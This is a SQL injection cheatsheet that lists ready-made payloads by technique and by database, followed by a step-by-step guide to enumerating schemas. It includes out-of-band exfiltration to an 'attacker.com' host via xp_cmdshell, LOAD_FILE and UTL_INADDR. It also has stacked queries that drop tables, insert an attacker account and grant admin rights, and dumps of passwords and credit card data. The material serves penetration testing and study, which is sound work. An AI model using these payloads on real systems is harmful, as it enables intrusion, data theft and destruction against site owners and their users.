SQLi Cheatsheet

WAF or code bypas

SELECT * FROM users WHERE username=CHAR(97,100,109,105,110) -- : admin

Trailing space also works so querying for 'admin '

Error-Based SQLi

Used when error messages are visible — injects code that triggers database errors containing useful information.

' AND 1=CONVERT(int,(SELECT @@version))-- 
' AND extractvalue(1,concat(0x7e,(SELECT database()),0x7e))-- 
' AND updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)--

Time-Based Blind SQLi

Used when there's no output or error but you can measure the **response time** to infer data.

' AND IF(1=1, SLEEP(5), 0)-- 
'; WAITFOR DELAY '0:0:5'-- 
' OR IF(ASCII(SUBSTRING(user(),1,1))>80, SLEEP(5), 0)--

UNION-Based SQLi

Used when the server returns query results. Union combines results from two queries — good for extracting table data.

' UNION SELECT NULL,NULL,NULL--  : Column count check
' UNION SELECT user(), database(), version()--

Bypasses & Encoding Tricks

Helps bypass simple WAFs or input filters. Encodings, whitespace tricks, and comment injection can evade naive protections.

'/**/OR/**/1=1-- 
' OR 1=1--+ 
CHAR(65)+CHAR(66)+CHAR(67)

Out-Of-Band (OOB) SQLi

Useful when in-band (error or time) channels are closed. Exfiltration is triggered via external systems like DNS or HTTP requests.

'; EXEC xp_cmdshell 'nslookup attacker.com'-- 
' UNION SELECT LOAD_FILE('\\\\attacker.com\\data.txt')--

Database-Specific Payloads

MySQL

' UNION SELECT user(), database(), version()-- 
' AND sleep(5)-- 
' AND updatexml(1,concat(0x7e,(SELECT @@datadir),0x7e),1)-- : Leak Db path

Microsoft SQL Server (MSSQL)

'; EXEC xp_cmdshell 'dir'-- 
'; WAITFOR DELAY '00:00:05'-- 
' UNION SELECT @@version--

Oracle

' AND 1=UTL_INADDR.GET_HOST_ADDRESS('attacker.com')-- 
' AND 1=(SELECT banner FROM v$version WHERE ROWNUM=1)--

PostgreSQL

' AND (SELECT pg_sleep(5))-- 
' UNION SELECT version(), current_database(), user--

Logical & Stacked Queries

Stacked queries (multiple statements separated by `;`) can allow direct control over DB structure — works only if server permits multiple queries per request.

'; DROP TABLE users;-- 
'; INSERT INTO users VALUES('attacker','pass');-- 
'; UPDATE users SET admin=1 WHERE username='guest';--

Tips & Practical Usage

SQLi Cheatsheet: Extracting Database Structure

Step 1: Determine DBMS

Each RDBMS uses different schema metadata tables. Detect DB type via version string or function support.

' UNION SELECT @@version--         
' UNION SELECT version()--         
' AND banner LIKE '%Oracle%' FROM v$version--

Step 2: Determine Column Count

Used to prepare for UNION SELECT. Find how many columns the original query returns:

' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 10--    
' UNION SELECT NULL,NULL,NULL--

Step 3: Enumerate Tables

Once UNION is working, dump table names from metadata tables.

MySQL

' UNION SELECT table_name,NULL FROM information_schema.tables WHERE table_schema=database()--

MSSQL

' UNION SELECT name,NULL FROM sysobjects WHERE xtype='U'--      
' UNION SELECT table_name,NULL FROM information_schema.tables--

PostgreSQL

' UNION SELECT table_name,NULL FROM information_schema.tables WHERE table_schema='public'--

Oracle

' UNION SELECT table_name,NULL FROM all_tables WHERE ROWNUM <= 10--

Step 4: Enumerate Columns for a Table

After identifying a table, use this to extract column names.

MySQL

' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--

MSSQL

' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--

PostgreSQL

' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--

Oracle

' UNION SELECT column_name,NULL FROM all_tab_columns WHERE table_name='USERS'--

Step 5: Dump Data from Found Tables

' UNION SELECT username, password FROM users--
' UNION SELECT email, credit_card FROM customers--

Tips for Schema Inference

Fuzzing Table/Column Names

' AND EXISTS(SELECT * FROM users)--    
' AND EXISTS(SELECT username FROM users)--

Tools & Further Reading